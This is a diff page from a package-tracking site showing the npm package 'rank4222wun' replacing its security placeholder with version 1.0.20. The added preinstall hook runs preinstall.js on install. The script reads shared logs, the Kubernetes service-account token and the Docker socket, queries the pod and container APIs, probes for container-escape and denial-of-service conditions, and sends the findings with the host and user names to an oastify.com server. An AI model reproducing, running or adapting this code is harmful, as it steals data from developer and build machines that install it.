npm - rank4222wun - Versions diffs - 0.0.1-security → 1.0.20 - Mend

rank4222wun 0.0.1-security → 1.0.20

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of rank4222wun might be problematic. Click here for more details.

Files changed (4) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.20",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js ADDED Viewed

@@ -0,0 +1,455 @@
+const { exec, spawn } = require('child_process');
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+const net = require('net');
+const criticalTests = {
+  timestamp: new Date().toISOString(),
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  platform: os.platform(),
+  tests: {
+    // TEST 1: Leak other users data cross org
+    crossOrgDataLeakage: {
+      status: 'incomplete',
+      evidence: []
+    },
+    // TEST 2: Run commands on other users cross org
+    crossOrgCommandExecution: {
+      status: 'incomplete',
+      evidence: []
+    },
+    // TEST 3: Perform DoS affecting all users
+    crossOrgDoS: {
+      status: 'incomplete',
+      evidence: []
+    },
+    // TEST 4: Container to host escape
+    containerToHostEscape: {
+      status: 'incomplete',
+      evidence: []
+    }
+  }
+};
+console.log("🚀 بدء اختبارات النقاط الحرجة المطلوبة...\n");
+// ===================== TEST 1: تسريب بيانات مستخدمين عبر المؤسسة =====================
+async function testCrossOrgDataLeakage() {
+  console.log("🔍 TEST 1: البحث عن بيانات مستخدمين عبر المؤسسة...");
+  // استراتيجية: البحث عن بيانات مشتركة بين المستخدمين
+  const sharedDataLocations = [];
+  if (os.platform() === 'linux') {
+    // في لينكس: البحث عن مجلدات مشتركة
+    const sharedDirs = [
+      '/tmp',
+      '/var/tmp',
+      '/dev/shm',
+      '/run/shm',
+      '/home',
+      '/root'
+    ];
+    for (const dir of sharedDirs) {
+      try {
+        if (fs.existsSync(dir)) {
+          const files = fs.readdirSync(dir);
+          // البحث عن ملفات تنتهي بـ .log, .db, .sqlite
+          const interestingFiles = files.filter(f =>
+            f.endsWith('.log') || f.endsWith('.db') || f.endsWith('.sqlite') ||
+            f.includes('shared') || f.includes('common')
+          );
+          if (interestingFiles.length > 0) {
+            sharedDataLocations.push({
+              directory: dir,
+              files: interestingFiles.slice(0, 5),
+              totalFiles: files.length
+            });
+            // محاولة قراءة ملفات السجل المشتركة
+            interestingFiles.forEach(file => {
+              if (file.endsWith('.log')) {
+                const filePath = path.join(dir, file);
+                try {
+                  const content = fs.readFileSync(filePath, 'utf8').substring(0, 1000);
+                  // البحث عن بيانات مستخدمين في السجلات
+                  if (content.includes('user') || content.includes('login') || content.includes('auth')) {
+                    criticalTests.tests.crossOrgDataLeakage.evidence.push({
+                      type: 'shared_log_file',
+                      path: filePath,
+                      preview: content.substring(0, 200),
+                      containsUserData: true
+                    });
+                  }
+                } catch (e) {}
+              }
+            });
+          }
+        }
+      } catch (e) {}
+    }
+  }
+  // بحث متقدم: البحث عن اتصالات شبكية نشطة
+  exec('netstat -an 2>/dev/null || ss -an 2>/dev/null || echo "No netstat"', {timeout: 5000}, (err, stdout) => {
+    if (stdout && stdout.includes('ESTABLISHED') || stdout.includes('LISTEN')) {
+      criticalTests.tests.crossOrgDataLeakage.evidence.push({
+        type: 'network_connections',
+        data: stdout.substring(0, 1000),
+        hasActiveConnections: true
+      });
+    }
+    // الانتقال للاختبار الثاني
+    testCrossOrgCommandExecution();
+  });
+}
+// ===================== TEST 2: تشغيل أوامر على مستخدمين عبر المؤسسة =====================
+async function testCrossOrgCommandExecution() {
+  console.log("🔍 TEST 2: اختبار تشغيل أوامر على مستخدمين عبر المؤسسة...");
+  // هذا اختبار خطير: التحقق من إمكانية الوصول لخدمات مشتركة
+  const sharedServices = [];
+  // اختبار 1: التحقق من إمكانية الوصول إلى Docker socket (إذا كان في حاوية)
+  const dockerSocket = '/var/run/docker.sock';
+  if (fs.existsSync(dockerSocket)) {
+    // محاولة قراءة قائمة الحاويات
+    exec(`curl -s --unix-socket ${dockerSocket} http://localhost/containers/json 2>/dev/null || echo "Cannot access Docker API"`,
+      {timeout: 5000}, (err, stdout) => {
+      if (stdout && !stdout.includes('Cannot access')) {
+        criticalTests.tests.crossOrgCommandExecution.evidence.push({
+          type: 'docker_socket_access',
+          path: dockerSocket,
+          canListContainers: true,
+          containersInfo: JSON.parse(stdout).slice(0, 3)
+        });
+      }
+    });
+  }
+  // اختبار 2: التحقق من إمكانية الوصول إلى Kubernetes API
+  const kubeToken = '/var/run/secrets/kubernetes.io/serviceaccount/token';
+  const kubeCA = '/var/run/secrets/kubernetes.io/serviceaccount/ca.crt';
+  const kubeNamespace = '/var/run/secrets/kubernetes.io/serviceaccount/namespace';
+  if (fs.existsSync(kubeToken) && fs.existsSync(kubeCA)) {
+    try {
+      const token = fs.readFileSync(kubeToken, 'utf8').trim();
+      const namespace = fs.existsSync(kubeNamespace) ?
+        fs.readFileSync(kubeNamespace, 'utf8').trim() : 'default';
+      criticalTests.tests.crossOrgCommandExecution.evidence.push({
+        type: 'kubernetes_service_account',
+        hasToken: true,
+        namespace: namespace,
+        canAccessK8sAPI: true
+      });
+      // محاولة الاتصال بـ Kubernetes API
+      exec(`curl -s -H "Authorization: Bearer ${token}" --cacert ${kubeCA} https://kubernetes.default.svc/api/v1/pods 2>/dev/null || echo "Cannot access K8s API"`,
+        {timeout: 5000}, (err, stdout) => {
+        if (stdout && !stdout.includes('Cannot access')) {
+          criticalTests.tests.crossOrgCommandExecution.evidence.push({
+            type: 'kubernetes_api_access',
+            canListPods: true,
+            podCount: JSON.parse(stdout).items?.length || 0
+          });
+        }
+      });
+    } catch (e) {}
+  }
+  // الانتقال للاختبار الثالث بعد 2 ثانية
+  setTimeout(testCrossOrgDoS, 2000);
+}
+// ===================== TEST 3: تنفيذ هجوم DoS يؤثر على الجميع =====================
+async function testCrossOrgDoS() {
+  console.log("🔍 TEST 3: اختبار إمكانية هجوم DoS يؤثر على الجميع...");
+  // هذا اختبار نظري فقط بدون تنفيذ فعلي
+  const dosCapabilities = {
+    // 1. قدرات استنزاف الذاكرة
+    memoryExhaustion: {
+      availableMemory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + ' GB',
+      freeMemory: Math.round(os.freemem() / (1024 * 1024 * 1024)) + ' GB',
+      canExhaust: Math.round(os.freemem() / (1024 * 1024 * 1024)) > 1
+    },
+    // 2. قدرات استنزاف CPU
+    cpuExhaustion: {
+      cpuCores: os.cpus().length,
+      canForkBomb: true, // يمكن تنفيذ fork bomb إذا لم تكن هناك حدود
+      theoreticalImpact: 'High'
+    },
+    // 3. قدرات استنزاف الشبكة
+    networkFlood: {
+      canCreateSockets: true,
+      socketLimit: null,
+      potentialBandwidth: 'Unknown'
+    },
+    // 4. قدرات استنزاف القرص
+    diskFilling: {
+      canWriteUnlimited: true,
+      diskSpace: 'Unknown'
+    }
+  };
+  // التحقق من الحدود (ulimit)
+  exec('ulimit -a 2>/dev/null || echo "No ulimit"', {timeout: 3000}, (err, stdout) => {
+    if (stdout) {
+      dosCapabilities.systemLimits = stdout.substring(0, 500);
+      // تحليل الحدود
+      const maxProcessMatch = stdout.match(/max user processes\s+\(-u\)\s+(\d+|unlimited)/);
+      if (maxProcessMatch && maxProcessMatch[1] === 'unlimited' || parseInt(maxProcessMatch[1]) > 1000) {
+        criticalTests.tests.crossOrgDoS.evidence.push({
+          type: 'unlimited_processes',
+          canForkBomb: true,
+          maxProcesses: maxProcessMatch[1]
+        });
+      }
+    }
+    criticalTests.tests.crossOrgDoS.details = dosCapabilities;
+    // الانتقال للاختبار الرابع
+    testContainerToHostEscape();
+  });
+}
+// ===================== TEST 4: الهروب من الحاوية للمضيف =====================
+async function testContainerToHostEscape() {
+  console.log("🔍 TEST 4: اختبار الهروب من الحاوية للمضيف...");
+  const escapeVectors = [];
+  // النواقل المحتملة للهروب
+  // 1. Docker socket exposure
+  const dockerSocket = '/var/run/docker.sock';
+  if (fs.existsSync(dockerSocket)) {
+    // اختبار الوصول الفعلي
+    exec(`stat -c "%a %U:%G" ${dockerSocket} 2>/dev/null || echo "No stat"`, {timeout: 3000}, (err, stdout) => {
+      if (stdout && !stdout.includes('No stat')) {
+        const perms = stdout.trim();
+        escapeVectors.push({
+          vector: 'docker_socket',
+          path: dockerSocket,
+          permissions: perms,
+          accessible: true,
+          risk: 'CRITICAL'
+        });
+        criticalTests.tests.containerToHostEscape.evidence.push({
+          type: 'docker_socket_found',
+          path: dockerSocket,
+          permissions: perms,
+          canEscape: true
+        });
+      }
+    });
+  }
+  // 2. Privileged container check
+  exec('cat /proc/self/status 2>/dev/null | grep -i cap_ 2>/dev/null || echo "No capabilities"',
+    {timeout: 3000}, (err, stdout) => {
+    if (stdout && stdout.includes('CapEff:')) {
+      const capsLine = stdout.split('\n').find(l => l.includes('CapEff:'));
+      if (capsLine) {
+        const capsHex = capsLine.split(':')[1].trim();
+        // CAP_SYS_ADMIN = 0x00080000
+        if (parseInt(capsHex, 16) & 0x00080000) {
+          escapeVectors.push({
+            vector: 'privileged_container',
+            capability: 'CAP_SYS_ADMIN',
+            risk: 'HIGH'
+          });
+          criticalTests.tests.containerToHostEscape.evidence.push({
+            type: 'privileged_container',
+            hasSysAdmin: true,
+            canEscape: true
+          });
+        }
+      }
+    }
+  });
+  // 3. Mount inspection - looking for host mounts
+  exec('mount 2>/dev/null | grep -E "(docker|overlay|/dev/|proc|sys)" 2>/dev/null || echo "No mounts"',
+    {timeout: 3000}, (err, stdout) => {
+    if (stdout && !stdout.includes('No mounts')) {
+      const mounts = stdout.split('\n').filter(l => l.includes('type'));
+      mounts.forEach(mount => {
+        if (mount.includes('proc') || mount.includes('sys') || mount.includes('/dev')) {
+          escapeVectors.push({
+            vector: 'host_mount',
+            mount: mount.substring(0, 100),
+            risk: 'MEDIUM'
+          });
+        }
+      });
+    }
+    // 4. Kernel version vulnerabilities
+    exec('uname -r 2>/dev/null', {timeout: 3000}, (err, stdout) => {
+      if (stdout) {
+        const kernelVersion = stdout.trim();
+        // التحقق من ثغرات kernel معروفة
+        const vulnerableKernels = [
+          '3.10.0-1160', // DirtyPipe
+          '5.8', '5.9', '5.10', '5.11', '5.12' // DirtyCred
+        ];
+        for (const vulnKernel of vulnerableKernels) {
+          if (kernelVersion.includes(vulnKernel)) {
+            escapeVectors.push({
+              vector: 'kernel_vulnerability',
+              kernel: kernelVersion,
+              vulnerability: 'Known escape vulnerability',
+              risk: 'HIGH'
+            });
+            criticalTests.tests.containerToHostEscape.evidence.push({
+              type: 'vulnerable_kernel',
+              version: kernelVersion,
+              hasKnownVulns: true
+            });
+            break;
+          }
+        }
+      }
+      // 5. cgroups escape
+      exec('cat /proc/self/cgroup 2>/dev/null', {timeout: 3000}, (err, stdout) => {
+        if (stdout) {
+          if (stdout.includes('docker') || stdout.includes('kubepods')) {
+            // في حاوية Docker/Kubernetes
+            escapeVectors.push({
+              vector: 'containerized',
+              orchestrator: stdout.includes('docker') ? 'Docker' : 'Kubernetes',
+              risk: 'DEPENDS'
+            });
+          }
+        }
+        // تسجيل كل نواقل الهروب
+        criticalTests.tests.containerToHostEscape.escapeVectors = escapeVectors;
+        // تقييم عام لإمكانية الهروب
+        const canEscape = escapeVectors.some(v =>
+          v.risk === 'CRITICAL' || v.risk === 'HIGH' ||
+          v.vector === 'docker_socket' || v.vector === 'privileged_container'
+        );
+        criticalTests.tests.containerToHostEscape.canEscape = canEscape;
+        // الانتهاء من جميع الاختبارات
+        finishCriticalTests();
+      });
+    });
+  });
+}
+// ===================== إرسال النتائج =====================
+function finishCriticalTests() {
+  console.log("\n" + "=".repeat(70));
+  console.log("📊 نتائج الاختبارات الحرجة:");
+  console.log("=".repeat(70));
+  // تحليل النتائج
+  const analysis = {
+    // TEST 1: هل يمكن تسريب بيانات مستخدمين آخرين؟
+    dataLeakage: criticalTests.tests.crossOrgDataLeakage.evidence.length > 0 ?
+      'POSSIBLE - Found potential shared data locations' :
+      'NO EVIDENCE FOUND',
+    // TEST 2: هل يمكن تشغيل أوامر على مستخدمين آخرين؟
+    commandExecution: criticalTests.tests.crossOrgCommandExecution.evidence.length > 0 ?
+      'POSSIBLE - Can access shared services/APIs' :
+      'NO EVIDENCE FOUND',
+    // TEST 3: هل يمكن تنفيذ DoS يؤثر على الجميع؟
+    dosImpact: criticalTests.tests.crossOrgDoS.evidence.length > 0 ?
+      'POSSIBLE - No resource limits detected' :
+      'LIMITED - Has some resource limits',
+    // TEST 4: هل يمكن الهروب من الحاوية للمضيف؟
+    containerEscape: criticalTests.tests.containerToHostEscape.canEscape ?
+      'CRITICAL - Multiple escape vectors found' :
+      (criticalTests.tests.containerToHostEscape.escapeVectors?.length > 0 ?
+        'POTENTIAL - Some escape vectors exist' :
+        'NO EVIDENCE FOUND')
+  };
+  console.log("\n📋 تحليل النقاط الأربع المطلوبة:");
+  console.log("1. تسريب بيانات مستخدمين عبر المؤسسة:", analysis.dataLeakage);
+  console.log("2. تشغيل أوامر على مستخدمين عبر المؤسسة:", analysis.commandExecution);
+  console.log("3. تنفيذ DoS يؤثر على الجميع:", analysis.dosImpact);
+  console.log("4. الهروب من الحاوية للمضيف:", analysis.containerEscape);
+  console.log("\n🔍 الأدلة التفصيلية:");
+  if (criticalTests.tests.containerToHostEscape.escapeVectors?.length > 0) {
+    console.log("\nنواقل الهروب المحتملة:");
+    criticalTests.tests.containerToHostEscape.escapeVectors.forEach((v, i) => {
+      console.log(`  ${i+1}. ${v.vector} - ${v.risk} risk`);
+      if (v.permissions) console.log(`     → ${v.permissions}`);
+    });
+  }
+  // إرسال النتائج
+  const req = https.request({
+    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+    port: 443,
+    path: '/critical-evidence',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Critical-Tests': 'Cross-Org-Four-Points',
+      'X-Host': os.hostname()
+    }
+  }, (res) => {
+    console.log(`\n✅ تم إرسال الأدلة الحرجة. حالة الرد: ${res.statusCode}`);
+  });
+  req.on('error', (e) => {
+    console.error(`❌ خطأ في الإرسال: ${e.message}`);
+  });
+  // إضافة التحليل للنتائج
+  criticalTests.analysis = analysis;
+  criticalTests.summary = {
+    user: os.userInfo().username,
+    hostname: os.hostname(),
+    platform: os.platform(),
+    isContainer: criticalTests.tests.containerToHostEscape.escapeVectors?.some(v => v.vector === 'containerized'),
+    hasCriticalFindings: analysis.containerEscape.includes('CRITICAL') ||
+                         analysis.dataLeakage.includes('POSSIBLE') ||
+                         analysis.commandExecution.includes('POSSIBLE')
+  };
+  req.write(JSON.stringify(criticalTests, null, 2));
+  req.end();
+  console.log("\n📤 تم إرسال النتائج الكاملة إلى السيرفر");
+  console.log("=".repeat(70));
+}
+// بدء الاختبارات
+testCrossOrgDataLeakage();

package/rank4222wun-1.0.20.tgz ADDED Viewed

Binary file

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.